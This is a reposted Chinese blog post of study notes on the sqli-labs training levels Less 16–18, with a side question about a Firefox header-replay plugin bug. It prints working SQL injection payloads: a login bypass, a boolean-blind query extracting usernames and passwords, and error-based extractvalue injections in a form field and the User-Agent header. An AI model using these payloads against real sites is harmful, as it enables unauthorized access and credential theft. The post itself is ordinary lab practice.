【20171031早】sqli-libs Less 16,17 和live http headers 使用问题

转载 于 2017-10-31 14:04:00 发布 · 108 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/heijuelou/p/7761192.html

本文详细解析了三个SQL注入的实战案例,包括不同类型的payload构造方法,并探讨了解决Firefox LiveHttpHeaders插件bug的方法。

  Less 16:

  和Less 15一样

  payload:

    登陆: a : b") or 1=1#

    注入:a : b") or (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97# (boolean 注入)

  Less 17:

  题目:

  分析:闭合方式是 ',回显是通过错误信息,因此

  payload:

  uname=admin&passwd=1' and extractvalue(1, concat(0x7e, (select @@version), 0x7e))#&submit=Submit

  结果:

 

  Less 18:

  分析:通过看源码可以知道,这题要通过user-agent注入,工具live http headers,可以实现修改并replay。

  TRY:网上的payload:将user-agent修改为:'and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and '1'='1

  问题:firefox 中的live http headers存在bug,无法实现replay,修改方案是:

    方案一:

      使用最新修改过bug的clone版本,但是老黑测试过,也不能修改

 

 

    方案二:修改源文件,可以也同样不能修改HTTP Headers,下午继续找找解决方案!

      原文地址

 

转载于:https://www.cnblogs.com/heijuelou/p/7761192.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值